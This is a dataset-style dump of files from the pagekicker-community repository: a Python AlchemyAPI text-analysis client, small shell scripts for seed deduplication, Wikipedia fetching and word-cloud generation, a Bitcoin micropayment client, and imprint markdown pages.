setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_CategoryParams, self).getParameterString()\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._baseUrl != \"\":\n retString += \"&baseUrl=\" + urllib.parse.quote(self._baseUrl)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n return retString\n\n\nclass AlchemyAPI_LanguageParams(AlchemyAPI_Params):\n _sourceText = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n def getSourceText(self):\n return self._sourceText\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cleaned':\n if setting != 'raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_LanguageParams, self).getParameterString()\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n return retString\n\n\nclass AlchemyAPI_ConceptParams(AlchemyAPI_Params):\n _sourceText = \"\"\n _showSourceText = \"\"\n _maxRetrieve = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n _linkedData = \"\"\n def getSourceText(self):\n return self._sourceText\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ShowSourceText.')\n self._showSourceText = setting\n def getMaxRetrieve(self):\n return self._maxRetrieve\n def setMaxRetrieve(self, setting):\n self._maxRetrieve = setting\n def getLinkedData(self):\n return self._linkedData\n def setLinkedData(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting LinkedData.')\n self._linkedData = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_ConceptParams, self).getParameterString()\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + str(self._showSourceText)\n if self._maxRetrieve != \"\":\n retString += \"&maxRetrieve=\" + str(self._maxRetrieve)\n if self._linkedData != \"\":\n retString += \"&linkedData=\" + str(self._linkedData)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n return retString\n\n\nclass AlchemyAPI_KeywordParams(AlchemyAPI_Params):\n _sourceText = \"\"\n _showSourceText = \"\"\n _sentiment = \"\"\n _maxRetrieve = \"\"\n _baseUrl = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n _keywordExtractMode = \"\"\n def getSourceText(self):\n return self._sourceText\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ShowSourceText.')\n self._showSourceText = setting\n def getSentiment(self):\n return self._sentiment\n def setSentiment(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Sentiment.')\n self._sentiment = setting\n def getMaxRetrieve(self):\n return self._maxRetrieve\n def setMaxRetrieve(self, setting):\n self._maxRetrieve = setting\n def getBaseUrl(self):\n return self._baseUrl\n def setBaseUrl(self, setting):\n self._baseUrl = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getKeywordExtractMode(self):\n return self._keywordExtractMode\n def setKeywordExtractMode(self, setting):\n if setting != 'strict':\n if setting != 'normal':\n if setting != '':\n raise Exception('Error setting KeywordExtractMode.')\n self._keywordExtractMode = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_KeywordParams, self).getParameterString()\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + str(self._showSourceText)\n if self._maxRetrieve != \"\":\n retString += \"&maxRetrieve=\" + str(self._maxRetrieve)\n if self._baseUrl != \"\":\n retString += \"&baseUrl=\" + urllib.parse.quote(self._baseUrl)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n if self._keywordExtractMode != \"\":\n retString += \"&keywordExtractMode=\" + urllib.parse.quote(self._keywordExtractMode)\n if self._sentiment != \"\":\n retString += \"&sentiment=\" + str(self._sentiment)\n return retString\n\t\n\t\nclass AlchemyAPI_RelationParams(AlchemyAPI_Params):\n _disambiguate = \"\"\n _linkedData = \"\"\n _coreference = \"\"\n _entities = \"\"\n _sentimentExcludeEntities = \"\"\n _requireEntities = \"\"\n _sourceText = \"\"\n _showSourceText = \"\"\n _maxRetrieve = \"\"\n _baseUrl = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n _sentiment = \"\"\n def getDisambiguate(self):\n return self._disambiguate\n def setDisambiguate(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Disambiguate.')\n self._disambiguate = setting\n def getLinkedData(self):\n return self._linkedData\n def setLinkedData(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting LinkedData.')\n self._linkedData = setting\n def getCoreference(self):\n return self._coreference\n def setCoreference(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Coreference.')\n self._coreference = setting\n def getEntities(self):\n return self._entities\n def setEntities(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Entities.')\n self._entities = setting\n def getSentimentExcludeEntities(self):\n return self._sentimentExcludeEntities\n def setSentimentExcludeEntities(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting SentimentExcludeEntities.')\n self._sentimentExcludeEntities = setting\n def getRequireEntities(self):\n return self._requireEntities\n def setRequireEntities(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting RequireEntities.')\n self._requireEntities = setting\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ShowSourceText.')\n self._showSourceText = setting\n def getSourceText(self):\n return self._quotations\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cleaned':\n if setting != 'raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getMaxRetrieve(self):\n return self._maxRetrieve\n def setMaxRetrieve(self, setting):\n self._maxRetrieve = setting\n def getBaseUrl(self):\n return self._baseUrl\n def setBaseUrl(self, setting):\n self._baseUrl = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getSentiment(self):\n return self._sentiment\n def setSentiment(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Sentiment.')\n self._sentiment = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_RelationParams, self).getParameterString()\n if self._disambiguate != \"\":\n retString += \"&disambiguate=\" + str(self._disambiguate)\n if self._linkedData != \"\":\n retString += \"&linkedData=\" + str(self._linkedData)\n if self._coreference != \"\":\n retString += \"&coreference=\" + str(self._coreference)\n if self._entities != \"\":\n retString += \"&entities=\" + str(self._entities)\n if self._sentimentExcludeEntities != \"\":\n retString += \"&sentimentExcludeEntities=\" + str(self._sentimentExcludeEntities)\n if self._requireEntities != \"\":\n retString += \"&requireEntities=\" + str(self._requireEntities)\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + str(self._showSourceText)\n if self._maxRetrieve != \"\":\n retString += \"&maxRetrieve=\" + str(self._maxRetrieve)\n if self._baseUrl != \"\":\n retString += \"&baseUrl=\" + urllib.parse.quote(self._baseUrl)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n if self._sentiment != \"\":\n retString += \"&sentiment=\" + str(self._sentiment)\n return retString\n\nclass AlchemyAPI_TextParams(AlchemyAPI_Params):\n _useMetaData = \"\"\n _extractLinks = \"\"\n def getUseMetaData(self):\n return self._useMetaData\n def setUseMetaData(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting UseMetaData.')\n self._useMetaData = setting\n def getExtractLinks(self):\n return self._extractLinks\n def setExtractLinks(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ExtractLinks.')\n self._extractLinks = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_TextParams, self).getParameterString()\n if self._useMetaData != \"\":\n retString += \"&useMetaData=\" + str(self._useMetaData)\n if self._extractLinks != \"\":\n retString += \"&extractLinks=\" + str(self._extractLinks)\n return retString\n\n\nclass AlchemyAPI_ConstraintQueryParams(AlchemyAPI_Params):\n _cQuery = \"\"\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_ConstraintQueryParams, self).getParameterString()\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n return retString\n\nclass AlchemyAPI_TargetedSentimentParams(AlchemyAPI_Params):\n _showSourceText = \"\"\n _target = \"\"\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting showSourceText.')\n self._showSourceText = setting\n def getTarget(self):\n return self._target\n def setTarget(self, setting):\n self._target = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_TargetedSentimentParams, self).getParameterString()\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + str(self._showSourceText)\n if self._target != \"\":\n retString += \"&target=\" + str(self._target)\n return retString\n\nclass AlchemyAPI:\n _apiKey = \"\"\n _hostPrefix = \"access\"\n def setAPIHost(self, apiHost):\n self._hostPrefix = apiHost;\n if len(self._hostPrefix) < 2:\n raise Exception('Error setting API host.')\n def setAPIKey(self, apiKey):\n self._apiKey = apiKey;\n if len(self._apiKey) < 5:\n raise Exception('Error setting API key.')\n def loadAPIKey(self, filename):\n file = open(filename, 'r')\n line = file.readline()\n self._apiKey = line.strip();\n if len(self._apiKey) < 5:\n raise Exception('Error loading API key.')\n def URLGetRankedNamedEntities(self, url, namedEntityParams=None):\n self.CheckURL(url)\n if namedEntityParams == None:\n namedEntityParams = AlchemyAPI_NamedEntityParams()\n namedEntityParams.setUrl(url)\n return self.GetRequest(\"URLGetRankedNamedEntities\", \"url\", namedEntityParams)\n def HTMLGetRankedNamedEntities(self, html, url, namedEntityParams=None):\n self.CheckHTML(html, url)\n if namedEntityParams == None:\n namedEntityParams = AlchemyAPI_NamedEntityParams()\n namedEntityParams.setUrl(url)\n namedEntityParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRankedNamedEntities\", \"html\", namedEntityParams)\n def TextGetRankedNamedEntities(self, text, namedEntityParams=None):\n self.CheckText(text)\n if namedEntityParams == None:\n namedEntityParams = AlchemyAPI_NamedEntityParams()\n namedEntityParams.setText(text)\n return self.PostRequest(\"TextGetRankedNamedEntities\", \"text\", namedEntityParams)\n def URLGetRankedConcepts(self, url, conceptParams=None):\n self.CheckURL(url)\n if conceptParams == None:\n conceptParams = AlchemyAPI_ConceptParams()\n conceptParams.setUrl(url)\n return self.GetRequest(\"URLGetRankedConcepts\", \"url\", conceptParams)\n def HTMLGetRankedConcepts(self, html, url, conceptParams=None):\n self.CheckHTML(html, url)\n if conceptParams == None:\n conceptParams = AlchemyAPI_ConceptParams()\n conceptParams.setUrl(url)\n conceptParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRankedConcepts\", \"html\", conceptParams)\n def TextGetRankedConcepts(self, text, conceptParams=None):\n self.CheckText(text)\n if conceptParams == None:\n conceptParams = AlchemyAPI_ConceptParams()\n conceptParams.setText(text)\n return self.PostRequest(\"TextGetRankedConcepts\", \"text\", conceptParams)\n def URLGetRankedKeywords(self, url, keywordParams=None):\n self.CheckURL(url)\n if keywordParams == None:\n keywordParams = AlchemyAPI_KeywordParams()\n keywordParams.setUrl(url)\n return self.GetRequest(\"URLGetRankedKeywords\", \"url\", keywordParams)\n def HTMLGetRankedKeywords(self, html, url, keywordParams=None):\n self.CheckHTML(html, url)\n if keywordParams == None:\n keywordParams = AlchemyAPI_KeywordParams()\n keywordParams.setUrl(url)\n keywordParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRankedKeywords\", \"html\", keywordParams)\n def TextGetRankedKeywords(self, text, keywordParams=None):\n self.CheckText(text)\n if keywordParams == None:\n keywordParams = AlchemyAPI_KeywordParams()\n keywordParams.setText(text)\n return self.PostRequest(\"TextGetRankedKeywords\", \"text\", keywordParams)\n def URLGetLanguage(self, url, languageParams=None):\n self.CheckURL(url)\n if languageParams == None:\n languageParams = AlchemyAPI_LanguageParams()\n languageParams.setUrl(url)\n return self.GetRequest(\"URLGetLanguage\", \"url\", languageParams)\n def HTMLGetLanguage(self, html, url, languageParams=None):\n self.CheckHTML(html, url)\n if languageParams == None:\n languageParams = AlchemyAPI_LanguageParams()\n languageParams.setUrl(url)\n languageParams.setHtml(html)\n return self.PostRequest(\"HTMLGetLanguage\", \"html\", languageParams)\n def TextGetLanguage(self, text, languageParams=None):\n self.CheckText(text)\n if languageParams == None:\n languageParams = AlchemyAPI_LanguageParams()\n languageParams.setText(text)\n return self.PostRequest(\"TextGetLanguage\", \"text\", languageParams)\n def URLGetCategory(self, url, categParams=None):\n self.CheckURL(url)\n if categParams == None:\n categParams = AlchemyAPI_CategoryParams()\n categParams.setUrl(url)\n return self.GetRequest(\"URLGetCategory\", \"url\", categParams)\n def HTMLGetCategory(self, html, url, categParams=None):\n self.CheckHTML(html, url)\n if categParams == None:\n categParams = AlchemyAPI_CategoryParams()\n categParams.setUrl(url)\n categParams.setHtml(html)\n return self.PostRequest(\"HTMLGetCategory\", \"html\", categParams)\n def TextGetCategory(self, text, categParams=None):\n self.CheckText(text)\n if categParams == None:\n categParams = AlchemyAPI_CategoryParams()\n categParams.setText(text)\n return self.PostRequest(\"TextGetCategory\", \"text\", categParams)\n def URLGetText(self, url, textParams=None):\n self.CheckURL(url)\n if textParams == None:\n textParams = AlchemyAPI_TextParams()\n textParams.setUrl(url)\n return self.GetRequest(\"URLGetText\", \"url\", textParams)\n def HTMLGetText(self, html, url, textParams=None):\n self.CheckHTML(html, url)\n if textParams == None:\n textParams = AlchemyAPI_TextParams()\n textParams.setUrl(url)\n textParams.setHtml(html)\n return self.PostRequest(\"HTMLGetText\", \"html\", textParams)\n def URLGetRawText(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetRawText\", \"url\", baseParams)\n def HTMLGetRawText(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRawText\", \"html\", baseParams)\n def URLGetTitle(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetTitle\", \"url\", baseParams)\n def HTMLGetTitle(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetTitle\", \"html\", baseParams)\n def URLGetFeedLinks(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetFeedLinks\", \"url\", baseParams)\n def HTMLGetFeedLinks(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetFeedLinks\", \"html\", baseParams)\n def URLGetMicroformats(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetMicroformatData\", \"url\", baseParams)\n def HTMLGetMicroformats(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetMicroformatData\", \"html\", baseParams)\n def URLGetConstraintQuery(self, url, query, cQueryParams=None):\n self.CheckURL(url)\n if len(query) < 2:\n raise Exception('Invalid constraint query specified.')\n if cQueryParams == None:\n cQueryParams = AlchemyAPI_ConstraintQueryParams()\n cQueryParams.setUrl(url)\n cQueryParams.setConstraintQuery(query)\n return self.GetRequest(\"URLGetConstraintQuery\", \"url\", cQueryParams)\n def HTMLGetConstraintQuery(self, html, url, query, cQueryParams=None):\n self.CheckHTML(html, url)\n if len(query) < 2:\n raise Exception('Invalid constraint query specified.')\n if cQueryParams == None:\n cQueryParams = AlchemyAPI_ConstraintQueryParams()\n cQueryParams.setUrl(url)\n cQueryParams.setHtml(html)\n cQueryParams.setConstraintQuery(query)\n return self.PostRequest(\"HTMLGetConstraintQuery\", \"html\", cQueryParams)\n def URLGetTextSentiment(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetTextSentiment\", \"url\", baseParams)\n def HTMLGetTextSentiment(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetTextSentiment\", \"html\", baseParams)\n def TextGetTextSentiment(self, text, baseParams=None):\n self.CheckText(text)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setText(text)\n return self.PostRequest(\"TextGetTextSentiment\", \"text\", baseParams)\n def URLGetTargetedSentiment(self, url, target, targetedSentimentParams=None):\n self.CheckURL(url)\n if targetedSentimentParams == None:\n targetedSentimentParams = AlchemyAPI_TargetedSentimentParams()\n targetedSentimentParams.setUrl(url)\n targetedSentimentParams.setTarget(target)\n return self.GetRequest(\"URLGetTargetedSentiment\", \"url\", targetedSentimentParams)\n def HTMLGetTargetedSentiment(self, html, url, target, targetedSentimentParams=None):\n self.CheckHTML(html, url)\n if targetedSentimentParams == None:\n targetedSentimentParams = AlchemyAPI_TargetedSentimentParams()\n targetedSentimentParams.setUrl(url)\n targetedSentimentParams.setHtml(html)\n targetedSentimentParams.setTarget(target)\n return self.PostRequest(\"HTMLGetTargetedSentiment\", \"html\", targetedSentimentParams)\n def TextGetTargetedSentiment(self, text, target, targetedSentimentParams=None):\n self.CheckText(text)\n if targetedSentimentParams == None:\n targetedSentimentParams = AlchemyAPI_TargetedSentimentParams()\n targetedSentimentParams.setText(text)\n targetedSentimentParams.setTarget(target)\n return self.PostRequest(\"TextGetTargetedSentiment\", \"text\", targetedSentimentParams)\n def URLGetRelations(self, url, relationParams=None):\n self.CheckURL(url)\n if relationParams == None:\n relationParams = AlchemyAPI_RelationParams()\n relationParams.setUrl(url)\n return self.GetRequest(\"URLGetRelations\", \"url\", relationParams)\n def HTMLGetRelations(self, html, url, relationParams=None):\n self.CheckHTML(html, url)\n if relationParams == None:\n relationParams = AlchemyAPI_RelationParams()\n relationParams.setUrl(url)\n relationParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRelations\", \"html\", relationParams)\n def TextGetRelations(self, text, relationParams=None):\n self.CheckText(text)\n if relationParams == None:\n relationParams = AlchemyAPI_RelationParams()\n relationParams.setText(text)\n return self.PostRequest(\"TextGetRelations\", \"text\", relationParams)\n def URLGetAuthor(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetAuthor\", \"url\", baseParams)\n def HTMLGetAuthor(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetAuthor\", \"html\", baseParams)\n def CheckText(self, text):\n if len(self._apiKey) < 5:\n raise Exception('Please load an API key.')\n if len(text) < 5:\n raise Exception('Please specify some text to analyze.')\n def CheckHTML(self, html, url):\n if len(self._apiKey) < 5:\n raise Exception('Please load an API key.')\n if len(html) < 10:\n raise Exception('Please specify a HTML document to analyze.')\n if len(url) < 10:\n raise Exception('Please specify a URL to analyze.')\n def CheckURL(self, url):\n if len(self._apiKey) < 5:\n raise Exception('Please load an API key.')\n if len(url) < 10:\n raise Exception('Please specify a URL to analyze.')\n def PostRequest(self, apiCall, apiPrefix, paramObject):\n endpoint = 'http://' + self._hostPrefix + '.alchemyapi.com/calls/' + apiPrefix + '/' + apiCall\n argText = 'apikey=' + self._apiKey + paramObject.getParameterString()\n handle = urllib.request.urlopen(endpoint, argText)\n result = handle.read()\n handle.close()\n xpathQuery = './/status'\n nodes = etree.fromstring(result).find(xpathQuery)\n if nodes.text != \"OK\":\n raise Exception('Error making API call.')\n return result\n def GetRequest(self, apiCall, apiPrefix, paramObject):\n endpoint = 'http://' + self._hostPrefix + '.alchemyapi.com/calls/' + apiPrefix + '/' + apiCall\n endpoint += '?apikey=' + self._apiKey + paramObject.getParameterString()\n handle = urllib.request.urlopen(endpoint)\n result = handle.read()\n handle.close()\n xpathQuery = './/status'\n nodes = etree.fromstring(result).find(xpathQuery)\n if nodes.text != \"OK\":\n raise Exception('Error making API call.')\n return result\n" }, { "alpha_fraction": 0.7099767923355103, "alphanum_fraction": 0.7146171927452087, "avg_line_length": 38.181819915771484, "blob_id": "75ab3ca0dd313f243822205ce2907c8cae7bfdab", "content_id": "ac4b54339a1e05d088840a4bc03a031e5308c997", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 431, "license_type": "permissive", "max_line_length": 147, "num_lines": 11, "path": "/scripts/find-unique-seeds.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# assumes that this is located in scriptpath home\n\ncat $LOCAL_DATA\"seeds/history/seed-history.csv\" | cut -d, -f1 | sed 's/[ \\t]*$//' | sort | uniq > $LOCAL_DATA\"seeds/history/uniq.seed-history.csv\"\n\n# Concatenates the list files,\n# removes duplicate lines,\n# and finally writes the result to an output file.\necho \"sorted seed-history.csv and wrote to local-data/uniq.seed-history.csv\" | tee --append $sfb_log\nexit\n0\n" }, { "alpha_fraction": 0.47433459758758545, "alphanum_fraction": 0.5152091383934021, "avg_line_length": 42.79166793823242, "blob_id": "7a4ab039ed47b72b0cac526a04055a2a529db673", "content_id": "fe8feb8fc0ca9c39ce6b5cf422d481be848a2287", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1052, "license_type": "permissive", "max_line_length": 521, "num_lines": 24, "path": "/scripts/includes/fetch-links-as-array.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# fetch the documents for this seed\n\necho 'processing fetch list' | tee --append $sfb_log\n\n\twhile IFS='\t' read title \n\t\tdo\t\n\t\t\t\n\t\techo \"title is \" $title\n\n\t\tsafetitle=$(echo $title | sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/!/%21/g' -e 's/\"/%22/g' -e 's/#/%23/g' -e 's/\\$/%24/g' -e 's/\\&/%26/g' -e 's/'\\''/%27/g' -e 's/(/%28/g' -e 's/)/%29/g' -e 's/\\*/%2a/g' -e 's/+/%2b/g' -e 's/,/%2c/g' -e 's/-/%2d/g' -e 's/\\./%2e/g' -e 's/\\//%2f/g' -e 's/:/%3a/g' -e 's/;/%3b/g' -e 's//%3e/g' -e 's/?/%3f/g' -e 's/@/%40/g' -e 's/\\[/%5b/g' -e 's/\\\\/%5c/g' -e 's/\\]/%5d/g' -e 's/\\^/%5e/g' -e 's/_/%5f/g' -e 's/`/%60/g' -e 's/{/%7b/g' -e 's/|/%7c/g' -e 's/}/%7d/g' -e 's/~/%7e/g' -e 's/;/_/g')\n\n\t\techo \"safetitle is \" $safetitle\n\n\n\t\tfetchurlbase=\"http://en.wikipedia.org/w/index.php?action=render&title=\"\n\t\techo \"fetchurlbase is\" $fetchurlbase | tee --append $sfb_log\n\t\tfetchurl=$fetchurlbase$safetitle\n\t\techo \"next to be fetched is\" $fetchurl | tee --append $sfb_log\n\t\tfetchurl+=(\"$fetchurl\")\n\t\t\n\t\n\tdone <fetch/$uuid/titles.txt\n\necho \"fetcharray is\" ${fetcharray[@]}\n" }, { "alpha_fraction": 0.8360277414321899, "alphanum_fraction": 0.8360277414321899, "avg_line_length": 143, "blob_id": "196b8ac453a5a2b7d6b2b75c077b61a50fd41eb6", "content_id": "d4f36def2ea99292c6ecd123d104acdf634da0fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 433, "license_type": "permissive", "max_line_length": 410, "num_lines": 3, "path": "/conf/jobprofiles/imprints/xmedialab/xmedialab_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# About X Media Lab\n\nThe Internationally Acclaimed Digital Media Think-Tank and Creative Workshop X Media Lab is the internationally acclaimed creative industries event. X Media Lab creates a meeting place uniquely designed to assist companies and people in getting their own creative ideas successfully to market, through concept development, business matching, and direct access to world-class networks of creative professionals.\n\n" }, { "alpha_fraction": 0.673521876335144, "alphanum_fraction": 0.6992287635803223, "avg_line_length": 21.823530197143555, "blob_id": "8d1a684ebde8873e8b464c14cf9f7c49c648957f", "content_id": "8fd9b1d7e72bc2955146fb6df2cbfeaea37f95e7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 389, "license_type": "permissive", "max_line_length": 181, "num_lines": 17, "path": "/scripts/bin/pdf2printwordcloud.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. ../conf/config.txt\n\nfor file in *.pdf\ndo\n# build print-size Word Cloud image\n\n\tpdf2txt $file > $file.txt\n\n\techo \"converted \"$file \"to txt\"\n\n\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 2550 -h 3300 < $file.txt > $file\"printcloud.png\" 2> /dev/null\n\n\techo \"created print word cloud for \" $file\n\ndone\n\n" }, { "alpha_fraction": 0.6821862459182739, "alphanum_fraction": 0.6983805894851685, "avg_line_length": 23.700000762939453, "blob_id": "ac8c92bcede75030a849898bf452296575ff0b7b", "content_id": "2d66b58e2eda48c789c9e20e0b4849f133ccea68", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 494, "license_type": "permissive", "max_line_length": 71, "num_lines": 20, "path": "/scripts_python_3/bitcoin/fortune/pk21client.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom two1.wallet import Wallet\nfrom two1.bitrequests import BitTransferRequests\n\n# set up bitrequest client for BitTransfer requests\nwallet = Wallet()\nrequests = BitTransferRequests(wallet)\n\n# server address\nserver_url = 'http://localhost:5000/'\n\ndef buy_fortune():\n\n url = server_url+'buy?payout_address={0}'\n response = requests.get(url=url.format(wallet.get_payout_address()))\n print((response.text))\n \nif __name__ == '__main__':\n buy_fortune()\n" }, { "alpha_fraction": 0.7168949842453003, "alphanum_fraction": 0.7945205569267273, "avg_line_length": 23.22222137451172, "blob_id": "b1c02b1936dc70bd68c4b8548e1d14117e0ffebc", "content_id": "1aa73dbb51513c9dafc20c9837dfbfc13990b92b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 219, "license_type": "permissive", "max_line_length": 85, "num_lines": 9, "path": "/conf/jobprofiles/imprints/nimble/nimblecopyrightpage.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Nimble Books LLC\n\[email protected]\n\n1521 Martha Avenue, Ann Arbor, Michigan, USA 48103\n\nFront & back matter copyright Nimble Books LLC 2014\n\nOriginal Works included copyright Nimble Books LLC 2014 per agreement with the author\n\n" }, { 